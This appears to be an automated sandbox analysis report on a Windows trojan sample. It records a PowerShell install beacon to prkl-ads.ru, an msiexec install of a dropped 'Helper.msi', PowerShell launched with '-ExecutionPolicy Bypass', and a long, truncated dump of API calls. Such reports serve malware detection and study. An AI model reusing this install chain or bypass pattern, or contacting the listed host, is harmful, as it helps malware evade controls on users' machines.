Date: Mon, 21 Aug 2023 17:50:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14
Connection: close
Server: Apache/2.4.6 (CentOS) PHP/7.4.33
X-Powered-By: PHP/7.4.33
2023-08-21 17:50:56 UTC | 0 | IN | Data Raw: 34 30 34 20 48 54 54 50 20 45 72 72 6f 72
Data Ascii: 404 HTTP Error


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49737 | 81.177.140.69 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2023-08-21 17:50:57 UTC | 0 | OUT | GET /?status=install HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: prkl-ads.ru
2023-08-21 17:50:57 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Mon, 21 Aug 2023 17:50:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Server: Apache/2.4.6 (CentOS) PHP/7.4.33
X-Powered-By: PHP/7.4.33



Target ID: 0
Start time: 19:50:45
Start date: 21/08/2023
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Imagebase: 0x350000
File size: 7'465'048 bytes
MD5 hash: 19124312CAFA0B1C5524329755A5D6A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 19:50:47
Start date: 21/08/2023
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0x7ff781c40000
File size: 66'048 bytes
MD5 hash: 4767B71A318E201188A0D0A420C8B608
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 19:50:48
Start date: 21/08/2023
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B C
Imagebase: 0x1270000
File size: 59'904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 19:50:48
Start date: 21/08/2023
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 "
Imagebase: 0x1270000
File size: 59'904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 19:50:50
Start date: 21/08/2023
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67
Imagebase: 0x1270000
File size: 59'904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 19:50:51
Start date: 21/08/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Imagebase: 0xf70000
File size: 430'592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high
Has exited: false

Target ID: 7
Start time: 19:50:51
Start date: 21/08/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff766460000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false


                                                    Execution Graph

Execution Coverage: 4.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 19%
Total number of Nodes: 1218
Total number of Limit Nodes: 40

[Execution graph: the interactive node/edge dump is not reproduced here. The recoverable node labels are function addresses within the sample (for example 454260, 35ab90, 520372, 42a630, 3711b0) and the Windows API calls reached from them, among them CreateFileW, WriteFile, CloseHandle, MoveFileW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetSystemDirectoryW, FindResourceW, LoadResource, LockResource, SizeofResource, FindFirstFileW, FindClose, GetFullPathNameW, PathIsUNCW, GetLastError, GetProcessHeap, RtlAllocateHeap, RaiseException, EnterCriticalSection, LeaveCriticalSection, SleepConditionVariableCS, WaitForSingleObjectEx, RtlWakeAllConditionVariable, SetEvent and ResetEvent. The dump is truncated in the source.]
API calls 51516->51519 51517 35a850 2 API calls 51517->51487 51521 3717a1 51519->51521 51523 371606 51520->51523 51534 37158e 51520->51534 51520->51553 51521->51497 51524 3717d4 PathIsUNCW 51521->51524 51522 3713c3 51522->51504 51568 364e60 51522->51568 51537 371618 _wcsrchr 51523->51537 51620 35a550 26 API calls 3 library calls 51523->51620 51525 3718b7 51524->51525 51526 3717e8 51524->51526 51627 364a70 38 API calls 3 library calls 51525->51627 51626 364a70 38 API calls 3 library calls 51526->51626 51531 37143e 51536 371a90 26 API calls 51531->51536 51533 3715c4 SetLastError 51533->51500 51534->51533 51535 3715b7 FindClose 51534->51535 51535->51533 51539 371451 51536->51539 51538 371638 _wcsrchr 51537->51538 51621 35a550 26 API calls 3 library calls 51537->51621 51542 371665 51538->51542 51543 37164b 51538->51543 51539->51504 51541 371476 51539->51541 51618 371960 26 API calls 2 library calls 51541->51618 51542->51553 51623 35a550 26 API calls 3 library calls 51542->51623 51544 3716b3 51543->51544 51543->51553 51622 35a550 26 API calls 3 library calls 51543->51622 51544->51500 51545 3717f0 51545->51497 51546 364e60 84 API calls 51545->51546 51550 371871 51546->51550 51551 371a90 26 API calls 51550->51551 51552 371883 51551->51552 51552->51497 51628 371960 26 API calls 2 library calls 51552->51628 51553->51517 51553->51544 51554->51435 51557 51feae 51555->51557 51556 42a8f2 51562 36e010 25 API calls std::_Throw_Cpp_error 51556->51562 51557->51556 51559 51feca 51557->51559 51640 5354d3 EnterCriticalSection LeaveCriticalSection 51557->51640 51641 521bfa 51559->51641 51561 520d10 51562->51436 51563->51483 51564->51482 51565->51484 51566->51498 51567->51522 51569 364eb7 51568->51569 51570 364ff0 51568->51570 51573 364f09 51569->51573 51575 364ed9 51569->51575 51571 35a850 2 API calls 51570->51571 51572 364ffa 51571->51572 51630 35a610 26 API calls 51572->51630 51577 35ab90 12 API calls 51573->51577 51585 364f1b 51573->51585 51578 35a380 26 API calls 51575->51578 51576 
364fff 51579 35a850 2 API calls 51576->51579 51577->51585 51580 364ee1 51578->51580 51581 365009 51579->51581 51580->51531 51582 35a850 2 API calls 51581->51582 51583 365013 51582->51583 51584 36505a 51583->51584 51595 3650dd 51583->51595 51586 365061 51584->51586 51587 3650bf GetWindowLongW 51584->51587 51585->51572 51585->51576 51585->51581 51589 364f43 51585->51589 51590 3652a7 NtdllDefWindowProc_W 51586->51590 51592 365082 GetWindowLongW 51586->51592 51588 3650cc 51587->51588 51588->51590 51589->51581 51598 364f83 __Wcscoll __set_se_translator 51589->51598 51591 3652f6 51590->51591 51591->51531 51592->51590 51593 365098 GetWindowLongW SetWindowLongW NtdllDefWindowProc_W 51592->51593 51593->51591 51594 364f9f 51594->51531 51596 3652c9 51595->51596 51597 36515b SetWindowTextW 51595->51597 51596->51591 51601 529d16 ___std_exception_destroy 2 API calls 51596->51601 51599 365177 51597->51599 51600 36517d 51597->51600 51598->51594 51629 5252ef 24 API calls __cftof 51598->51629 51599->51600 51603 36520b 51600->51603 51604 365193 GlobalAlloc 51600->51604 51601->51591 51603->51596 51632 365580 61 API calls 4 library calls 51603->51632 51604->51603 51605 3651a3 GlobalLock 51604->51605 51609 3651b8 __Wcscoll __set_se_translator 51605->51609 51607 36523e 51608 3652b7 51607->51608 51612 365257 SetWindowLongW 51607->51612 51608->51596 51611 3651bd 51609->51611 51631 5252ef 24 API calls __cftof 51609->51631 51614 3651f1 GlobalUnlock 51611->51614 51613 36526b 51612->51613 51615 36529a 51613->51615 51633 529d16 51613->51633 51614->51603 51615->51588 51617->51539 51618->51504 51619->51514 51620->51537 51621->51538 51622->51553 51623->51553 51624->51506 51625->51516 51626->51545 51627->51552 51628->51497 51629->51594 51630->51576 51631->51611 51632->51607 51636 53820d 51633->51636 51635 529d2e 51635->51615 51637 538218 RtlFreeHeap 51636->51637 51639 53823a __dosmaperr __Wcscoll 51636->51639 51638 53822d GetLastError 51637->51638 51637->51639 51638->51639 51639->51635 51640->51557 
51642 521c41 RaiseException 51641->51642 51643 521c14 51641->51643 51642->51561 51643->51642 51644->51453 51645->51374 51646->51375 51647->51378 51648 46b960 51686 46a0b0 25 API calls 51648->51686 51650 46b99f 51687 3815f0 25 API calls 51650->51687 51652 46b9b7 51653 358810 24 API calls 51652->51653 51654 46b9df 51653->51654 51655 46ba19 __set_se_translator 51654->51655 51657 46bc48 51654->51657 51665 46ba73 51655->51665 51714 3689f0 24 API calls 51655->51714 51656 46bac9 51688 474b10 51656->51688 51659 5252ff std::_Throw_Cpp_error 24 API calls 51657->51659 51658 46baaf 51715 4762f0 57 API calls 3 library calls 51658->51715 51662 46bc4d 51659->51662 51667 5252ff std::_Throw_Cpp_error 24 API calls 51662->51667 51663 46bada 51716 358190 51663->51716 51665->51656 51665->51658 51670 46bc52 51667->51670 51668 46bb11 51726 46a0b0 25 API calls 51668->51726 51669 46bac6 51669->51656 51672 358190 25 API calls 51670->51672 51674 46bcb9 51672->51674 51673 46bb25 51727 4729a0 43 API calls 3 library calls 51673->51727 51728 521ad5 51674->51728 51677 46bccc 51741 4762f0 57 API calls 3 library calls 51677->51741 51679 46bcdb 51680 46bbdf 51681 358810 24 API calls 51680->51681 51683 46bc15 51681->51683 51682 46bb45 51682->51662 51682->51680 51684 358810 24 API calls 51683->51684 51685 46bc27 51684->51685 51686->51650 51687->51652 51742 358700 51688->51742 51690 474bb9 __set_se_translator 51691 474bea LoadStringW 51690->51691 51692 474c19 51691->51692 51697 474c43 __set_se_translator 51691->51697 51693 358190 25 API calls 51692->51693 51694 474c3a 51693->51694 51699 474ce5 51694->51699 51701 358810 24 API calls 51694->51701 51695 474c98 LoadStringW 51696 474caf 51695->51696 51695->51697 51698 358190 25 API calls 51696->51698 51697->51695 51757 474e80 26 API calls __set_se_translator 51697->51757 51698->51694 51702 474d87 51699->51702 51703 5252ff std::_Throw_Cpp_error 24 API calls 51699->51703 51701->51699 51702->51663 51704 474dcb 51703->51704 51705 474e6e 51704->51705 51706 
474e51 SysAllocStringLen 51704->51706 51707 474e09 SysFreeString 51704->51707 51708 35a850 2 API calls 51705->51708 51706->51707 51709 474e64 51706->51709 51713 474e4d 51707->51713 51710 474e78 51708->51710 51711 35a850 2 API calls 51709->51711 51711->51705 51713->51663 51714->51665 51715->51669 51717 358217 51716->51717 51720 3581a0 51716->51720 51759 358760 RaiseException 51717->51759 51718 3581ac 51718->51668 51720->51718 51722 358700 25 API calls 51720->51722 51725 3581ee 51722->51725 51725->51668 51726->51673 51727->51682 51760 521ae3 51728->51760 51730 521ada 51730->51677 51774 53950e EnterCriticalSection LeaveCriticalSection __set_se_translator 51730->51774 51732 529990 51733 52999b 51732->51733 51775 539553 24 API calls 3 library calls 51732->51775 51735 5299c4 51733->51735 51736 5299a5 IsProcessorFeaturePresent 51733->51736 51777 52b6a8 11 API calls __set_se_translator 51735->51777 51737 5299b1 51736->51737 51776 5250f3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __set_se_translator 51737->51776 51740 5299ce 51741->51679 51743 35874b 51742->51743 51744 35870b 51742->51744 51758 3586e0 25 API calls std::_Throw_Cpp_error 51743->51758 51745 358714 51744->51745 51746 358736 51744->51746 51745->51743 51748 35871b 51745->51748 51749 358746 51746->51749 51751 51fea9 3 API calls 51746->51751 51750 51fea9 3 API calls 51748->51750 51749->51690 51754 358721 51750->51754 51755 358740 51751->51755 51752 5252ff std::_Throw_Cpp_error 24 API calls 51753 358755 51752->51753 51754->51752 51756 35872a 51754->51756 51755->51690 51756->51690 51757->51697 51758->51754 51761 521aef GetLastError 51760->51761 51762 521aec 51760->51762 51778 524ccd 6 API calls ___vcrt_FlsGetValue 51761->51778 51762->51730 51764 521b04 51765 521b23 51764->51765 51766 521b69 SetLastError 51764->51766 51779 524d08 6 API calls ___vcrt_FlsGetValue 51764->51779 51765->51766 51766->51730 51768 521b1d 51768->51765 51769 521b45 51768->51769 51780 524d08 6 API calls 
___vcrt_FlsGetValue 51768->51780 51772 521b59 51769->51772 51781 524d08 6 API calls ___vcrt_FlsGetValue 51769->51781 51773 529d16 ___std_exception_destroy 2 API calls 51772->51773 51773->51765 51774->51732 51775->51733 51776->51735 51777->51740 51778->51764 51779->51768 51780->51769 51781->51772 51782 476f60 51791 476b40 51782->51791 51784 476fa1 GetFileVersionInfoSizeW 51785 47701e GetLastError 51784->51785 51786 476fba 51784->51786 51787 476fca 51785->51787 51786->51787 51789 476fd1 GetFileVersionInfoW 51786->51789 51788 477030 DeleteFileW 51787->51788 51790 477037 51787->51790 51788->51790 51789->51785 51789->51787 51792 476b7e 51791->51792 51793 476b86 SHGetFolderPathW 51792->51793 51794 476d79 51792->51794 51795 476ba4 51793->51795 51794->51784 51795->51794 51795->51795 51808 360ec0 51795->51808 51797 476c12 __set_se_translator 51842 45eab0 51797->51842 51799 476c41 GetTempFileNameW 51801 358810 24 API calls 51799->51801 51803 476c71 51801->51803 51802 476ce3 Wow64DisableWow64FsRedirection CopyFileW 51804 476d32 51802->51804 51803->51802 51803->51803 51805 476d67 51804->51805 51806 476d47 Wow64RevertWow64FsRedirection 51804->51806 51807 358810 24 API calls 51805->51807 51806->51805 51807->51794 51809 360f2e 51808->51809 51810 360f66 51808->51810 51811 520372 6 API calls 51809->51811 51813 360fcd 51810->51813 51815 520372 6 API calls 51810->51815 51830 361097 51810->51830 51818 360f38 51811->51818 51816 360fe6 GetTempPathW 51813->51816 51819 360fd6 51813->51819 51814 3610ca 51814->51797 51817 360f8d 51815->51817 51816->51819 51817->51813 51820 360f99 GetModuleHandleW GetProcAddress 51817->51820 51818->51810 51862 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51818->51862 51824 358190 25 API calls 51819->51824 51819->51830 51863 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51820->51863 51823 360fca 51823->51813 51825 361049 51824->51825 51864 45ecc0 27 API 
calls 51825->51864 51827 361061 51828 3610fb 51827->51828 51827->51830 51829 5252ff std::_Throw_Cpp_error 24 API calls 51828->51829 51831 361100 51829->51831 51865 357690 51830->51865 51832 360ec0 46 API calls 51831->51832 51833 361154 51832->51833 51834 357690 25 API calls 51833->51834 51835 36116b 51834->51835 51836 358810 24 API calls 51835->51836 51837 36118c 51836->51837 51876 3611e0 49 API calls std::_Throw_Cpp_error 51837->51876 51839 36119b 51840 358810 24 API calls 51839->51840 51841 3611b3 51840->51841 51841->51797 51843 45eb06 51842->51843 51846 45eb13 51842->51846 51844 357690 25 API calls 51843->51844 51845 45eb0e 51844->51845 51845->51799 51847 45ec83 51846->51847 51849 45eb50 PathIsUNCW 51846->51849 51848 357690 25 API calls 51847->51848 51848->51845 51850 45eb65 51849->51850 51851 45ec3b 51849->51851 51878 4609b0 26 API calls ___vcrt_FlsGetValue 51850->51878 51880 4609b0 26 API calls ___vcrt_FlsGetValue 51851->51880 51854 45eb8a 51854->51847 51857 45eb95 51854->51857 51855 45ec60 51855->51847 51856 45ec67 51855->51856 51858 357690 25 API calls 51856->51858 51859 357690 25 API calls 51857->51859 51860 45eb9e 51858->51860 51859->51860 51879 359ac0 25 API calls 51860->51879 51862->51810 51863->51823 51864->51827 51866 3576b6 51865->51866 51867 35772f 51866->51867 51869 3576c1 51866->51869 51877 358760 RaiseException 51867->51877 51870 3576cd 51869->51870 51873 358700 25 API calls 51869->51873 51870->51814 51874 35770c 51873->51874 51874->51814 51876->51839 51878->51854 51879->51845 51880->51855 51881 372b50 51884 47c810 51881->51884 51883 372b64 51885 47c846 51884->51885 51886 47c85a 51884->51886 51885->51883 51887 35ab90 12 API calls 51886->51887 51892 47c85f 51887->51892 51888 47ca3a 51889 35a850 2 API calls 51888->51889 51890 47ca44 51889->51890 51892->51888 51894 35a140 30 API calls 51892->51894 51896 47c91f GetActiveWindow 51892->51896 51898 47c9fe 51892->51898 51900 35ab90 12 API calls 51892->51900 51901 47ca50 43 API calls 51892->51901 51902 
35a6d0 26 API calls 3 library calls 51892->51902 51903 413270 LoadStringW LoadStringW 51892->51903 51904 49e1f0 51892->51904 51908 35a6d0 26 API calls 3 library calls 51892->51908 51894->51892 51896->51892 51898->51883 51900->51892 51901->51892 51902->51892 51903->51892 51906 49e30f 51904->51906 51907 49e215 51904->51907 51905 49e2b1 GetDiskFreeSpaceExW 51905->51906 51905->51907 51906->51892 51907->51905 51907->51906 51908->51896 51909 47a7e0 51910 47a815 51909->51910 51918 47a8d9 51909->51918 51911 47a8c1 51910->51911 51925 4814b0 51910->51925 51947 47bb50 109 API calls 51911->51947 51914 47a8ca 51916 371a90 26 API calls 51914->51916 51915 47a82d 51917 371a90 26 API calls 51915->51917 51916->51918 51919 47a83f 51917->51919 51920 371a90 26 API calls 51919->51920 51921 47a87c 51920->51921 51921->51911 51921->51918 51922 47a915 51921->51922 51923 35a850 2 API calls 51922->51923 51924 47a91f 51923->51924 51926 35ab90 12 API calls 51925->51926 51936 4814ec 51926->51936 51927 48193f 51928 35a850 2 API calls 51927->51928 51929 481949 51928->51929 51930 35a850 2 API calls 51929->51930 51932 481953 51930->51932 51931 48154e 52035 364bd0 51931->52035 51934 4818d5 51934->51915 51935 364e60 84 API calls 51935->51936 51936->51927 51936->51929 51936->51931 51936->51935 51937 35ab90 12 API calls 51936->51937 51939 35a380 26 API calls 51936->51939 51942 371a90 26 API calls 51936->51942 51945 35a6d0 26 API calls 51936->51945 51946 3711b0 96 API calls 51936->51946 51948 481960 51936->51948 52052 44e930 51936->52052 52075 371bb0 26 API calls 51936->52075 52076 46d5c0 28 API calls 51936->52076 52077 49f180 94 API calls _wcsrchr 51936->52077 51937->51936 51939->51936 51942->51936 51945->51936 51946->51936 51947->51914 51950 4819a1 51948->51950 51949 481a8a 51951 35ab90 12 API calls 51949->51951 51950->51949 51952 35a380 26 API calls 51950->51952 51953 481aba 51951->51953 51954 4819df 51952->51954 51961 481aeb 51953->51961 51962 481af6 51953->51962 52031 4821d5 51953->52031 52083 
46d5c0 28 API calls 51954->52083 51956 35a850 2 API calls 51958 4821fa 51956->51958 51957 4819ff 51957->51949 51959 481a07 51957->51959 51960 35a850 2 API calls 51958->51960 51963 371a90 26 API calls 51959->51963 51965 482204 51960->51965 51966 35a140 30 API calls 51961->51966 52085 35a6d0 26 API calls 3 library calls 51962->52085 51964 481a1b 51963->51964 51964->51958 51972 481a37 51964->51972 51974 481a47 51964->51974 52094 520658 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 51965->52094 51969 481af4 51966->51969 52078 3649d0 51969->52078 51970 482209 51972->51974 52084 371bb0 26 API calls 51972->52084 51974->51936 51975 481bbe 51979 35ab90 12 API calls 51975->51979 51976 481b4a SHGetFolderPathW 51978 481b74 51976->51978 51978->51978 52086 35a6d0 26 API calls 3 library calls 51978->52086 51980 481bce 51979->51980 51982 481c0a 51980->51982 51983 481bff 51980->51983 51980->52031 52088 35a6d0 26 API calls 3 library calls 51982->52088 51984 35a140 30 API calls 51983->51984 51986 481c08 51984->51986 51988 3649d0 2 API calls 51986->51988 51987 481b92 51987->51958 51987->51975 52087 371bb0 26 API calls 51987->52087 51990 481c2a 51988->51990 51991 481c54 GetSystemDirectoryW 51990->51991 51993 481c85 51990->51993 51991->51965 51991->51993 51992 35ab90 12 API calls 51992->51993 51993->51992 51994 35a6d0 26 API calls 51993->51994 51995 35a140 30 API calls 51993->51995 51996 3649d0 2 API calls 51993->51996 51997 481db0 51993->51997 51998 481d54 GetWindowsDirectoryW 51993->51998 51993->52031 51994->51993 51995->51993 51996->51993 51999 35ab90 12 API calls 51997->51999 51998->51965 51998->51993 52000 481db5 51999->52000 52001 481df1 52000->52001 52002 481de6 52000->52002 52000->52031 52089 35a6d0 26 API calls 3 library calls 52001->52089 52003 35a140 30 API calls 52002->52003 52005 481def 52003->52005 52006 3649d0 2 API calls 52005->52006 52007 481e11 52006->52007 52008 481e39 GetWindowsDirectoryW 
52007->52008 52009 481e60 52007->52009 52008->52009 52010 360ec0 49 API calls 52009->52010 52012 481f29 52009->52012 52011 481ebe 52010->52011 52013 45eab0 28 API calls 52011->52013 52014 481f7e GetModuleFileNameW 52012->52014 52015 481ff6 52012->52015 52028 482002 52012->52028 52017 481ed3 52013->52017 52020 481f97 52014->52020 52016 371a90 26 API calls 52015->52016 52016->52028 52090 35a6d0 26 API calls 3 library calls 52017->52090 52019 481f08 52021 358810 24 API calls 52019->52021 52020->51965 52091 35a6d0 26 API calls 3 library calls 52020->52091 52023 481f17 52021->52023 52025 358810 24 API calls 52023->52025 52024 482062 SHGetSpecialFolderLocation 52026 48218f SHGetPathFromIDListW SHGetMalloc 52024->52026 52024->52028 52025->52012 52026->52028 52027 520372 6 API calls 52027->52028 52028->52024 52028->52026 52028->52027 52029 4820f7 LoadLibraryW 52028->52029 52028->52031 52092 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52028->52092 52093 482210 76 API calls 52028->52093 52030 48210e 52029->52030 52030->52028 52032 482128 GetProcAddress 52030->52032 52031->51956 52032->52028 52036 364c46 52035->52036 52037 364c15 52035->52037 52039 35ab90 12 API calls 52036->52039 52048 364c57 52036->52048 52038 35a380 26 API calls 52037->52038 52040 364c1a 52038->52040 52039->52048 52040->51934 52041 364d31 52042 35a850 2 API calls 52041->52042 52045 364d3b 52042->52045 52043 364d22 52044 35a850 2 API calls 52043->52044 52046 364d2c 52044->52046 52096 35a610 26 API calls 52046->52096 52048->52041 52048->52043 52048->52046 52050 364cb5 __Wcscoll __set_se_translator 52048->52050 52049 364cd1 52049->51934 52050->52049 52095 5252ef 24 API calls __cftof 52050->52095 52053 35ab90 12 API calls 52052->52053 52059 44e96e 52053->52059 52054 44eae0 52055 35a850 2 API calls 52054->52055 52056 44eaea 52055->52056 52058 35a850 2 API calls 52056->52058 52057 44eaaf 52057->51936 52061 44eaf4 52058->52061 52059->52054 52059->52057 52060 
44ead6 52059->52060 52064 44e9e7 52059->52064 52063 35a850 2 API calls 52060->52063 52062 44eb0b 52061->52062 52065 529d16 ___std_exception_destroy 2 API calls 52061->52065 52062->51936 52063->52054 52066 44e9f5 52064->52066 52097 44eb50 RtlAllocateHeap RaiseException 52064->52097 52067 44eb39 52065->52067 52098 529907 24 API calls 2 library calls 52066->52098 52067->51936 52070 44ea0d 52070->52056 52072 44ea41 52070->52072 52099 35a660 26 API calls 52070->52099 52072->52056 52072->52072 52073 44ea91 52072->52073 52073->52057 52100 44eb10 RtlFreeHeap GetLastError ___std_exception_destroy 52073->52100 52075->51936 52076->51936 52077->51936 52079 364a51 52078->52079 52082 3649f8 52078->52082 52080 35a850 2 API calls 52079->52080 52081 364a5b 52080->52081 52082->51975 52082->51976 52083->51957 52084->51974 52085->51969 52086->51987 52087->51975 52088->51986 52089->52005 52090->52019 52091->52015 52092->52028 52093->52028 52094->51970 52095->52049 52096->52041 52097->52066 52098->52070 52099->52072 52100->52057 52101 48f2c0 52102 48f318 52101->52102 52107 48f2f7 52101->52107 52103 48f346 CreateFileW 52102->52103 52104 48f4ce 52102->52104 52108 48f338 52102->52108 52105 48f36f 52103->52105 52106 35a850 2 API calls 52104->52106 52109 48f396 GetLastError 52105->52109 52110 48f417 52105->52110 52111 48f4d8 52106->52111 52107->52102 52107->52104 52146 371bb0 26 API calls 52107->52146 52108->52103 52147 371bb0 26 API calls 52108->52147 52114 48f3ad 52109->52114 52131 4b00a0 52110->52131 52148 46cae0 84 API calls 52114->52148 52116 48f420 52118 48f42a 52116->52118 52119 48f4ae 52116->52119 52122 48f475 52118->52122 52123 48f42f GetLastError 52118->52123 52140 4912a0 52119->52140 52120 48f3c5 52149 47ca50 43 API calls 52120->52149 52125 48f449 52123->52125 52150 46cae0 84 API calls 52125->52150 52128 48f3db 52129 48f45d 52151 47ca50 43 API calls 52129->52151 52136 4b00e6 52131->52136 52132 4b013b SetFilePointer 52134 4b0162 ReadFile 52132->52134 52135 4b0154 GetLastError 
52132->52135 52133 4b00ed 52133->52116 52134->52133 52134->52136 52135->52133 52135->52134 52136->52132 52136->52133 52137 4b0216 SetFilePointer 52136->52137 52137->52133 52138 4b023e ReadFile 52137->52138 52138->52133 52139 4b0255 52138->52139 52139->52133 52152 491f00 52140->52152 52142 4912af 52143 48f4bc 52142->52143 52144 35a850 2 API calls 52142->52144 52145 4912f2 52144->52145 52146->52102 52147->52103 52148->52120 52149->52128 52150->52129 52151->52122 52153 491f4b SetFilePointer 52152->52153 52154 491fed 52152->52154 52153->52154 52155 492001 52153->52155 52154->52142 52156 35ab90 12 API calls 52155->52156 52157 492021 52156->52157 52158 49233f 52157->52158 52161 49205f ReadFile 52157->52161 52166 492205 52157->52166 52159 35a850 2 API calls 52158->52159 52160 492349 52159->52160 52162 35a850 2 API calls 52160->52162 52163 4922c1 GetLastError 52161->52163 52161->52166 52164 492353 52162->52164 52165 4922de 52163->52165 52164->52142 52170 46cae0 84 API calls 52165->52170 52166->52142 52168 4922f8 52171 47ca50 43 API calls 52168->52171 52170->52168 52171->52158 52172 38b0b0 52173 38b0c3 52172->52173 52178 521a9d 52173->52178 52176 38b0d9 SetUnhandledExceptionFilter 52177 38b0eb 52176->52177 52179 521ad5 __set_se_translator 34 API calls 52178->52179 52180 521aa6 52179->52180 52181 521ad5 __set_se_translator 34 API calls 52180->52181 52182 38b0cd 52181->52182 52182->52176 52182->52177 52183 4aba60 52184 4aba8f 52183->52184 52185 4abaa5 52183->52185 52186 35ab90 12 API calls 52185->52186 52187 4abaaa 52186->52187 52188 4abbb4 52187->52188 52189 4abab4 52187->52189 52190 35a850 2 API calls 52188->52190 52207 359bb0 43 API calls 52189->52207 52191 4abbbe 52190->52191 52192 35ab90 12 API calls 52191->52192 52202 4abbf5 52192->52202 52194 4abda9 52195 35a850 2 API calls 52194->52195 52196 4abdb3 52195->52196 52197 35a850 2 API calls 52196->52197 52198 4abdbd 52197->52198 52199 4abad9 52200 35ab90 12 API calls 52200->52202 52201 35a660 26 API calls 52201->52202 
52202->52194 52202->52196 52202->52200 52202->52201 52203 3649d0 2 API calls 52202->52203 52204 4abd42 52202->52204 52205 4abd52 52202->52205 52203->52202 52204->52205 52206 371a90 26 API calls 52204->52206 52206->52205 52207->52199 52208 4bf480 52219 4beba0 52208->52219 52210 4bf4aa 52228 4bf550 52210->52228 52213 4bf4ba 52251 4bf9f0 52213->52251 52216 4bf4c1 52259 4bfc20 52216->52259 52218 4bf4cc 52220 35cd80 25 API calls 52219->52220 52222 4bebb8 52220->52222 52221 358810 24 API calls 52221->52222 52222->52221 52224 4bebd0 52222->52224 52223 4bebf1 52227 4bec12 52223->52227 52294 359400 24 API calls std::_Throw_Cpp_error 52223->52294 52224->52223 52293 4c1070 24 API calls 52224->52293 52227->52210 52283 35cd80 52227->52283 52229 4bf9bc 52228->52229 52230 4bf5c0 52228->52230 52229->52213 52231 358190 25 API calls 52230->52231 52240 4bf5dc 52231->52240 52232 4bf6ff 52295 359bd0 52232->52295 52234 358190 25 API calls 52234->52240 52235 4bf713 52237 358810 24 API calls 52235->52237 52238 4bf74e 52237->52238 52239 358810 24 API calls 52238->52239 52249 4bf75a 52239->52249 52240->52232 52240->52234 52241 358810 24 API calls 52240->52241 52243 4bf9df 52240->52243 52300 3815f0 25 API calls 52240->52300 52241->52240 52242 4bf95e 52244 358810 24 API calls 52242->52244 52245 5252ff std::_Throw_Cpp_error 24 API calls 52243->52245 52244->52229 52246 4bf9e4 52245->52246 52247 358190 25 API calls 52247->52249 52249->52242 52249->52243 52249->52247 52250 358810 24 API calls 52249->52250 52301 3815f0 25 API calls 52249->52301 52250->52249 52252 4bfa25 52251->52252 52254 4bfa2c 52251->52254 52252->52216 52255 358190 25 API calls 52254->52255 52257 4bfb37 52254->52257 52303 38a7a0 25 API calls 52254->52303 52255->52254 52257->52252 52304 52a3fe 29 API calls 52257->52304 52305 4c1240 26 API calls 52257->52305 52260 4c0556 52259->52260 52266 4bfc83 __set_se_translator 52259->52266 52260->52218 52261 51fea9 3 API calls 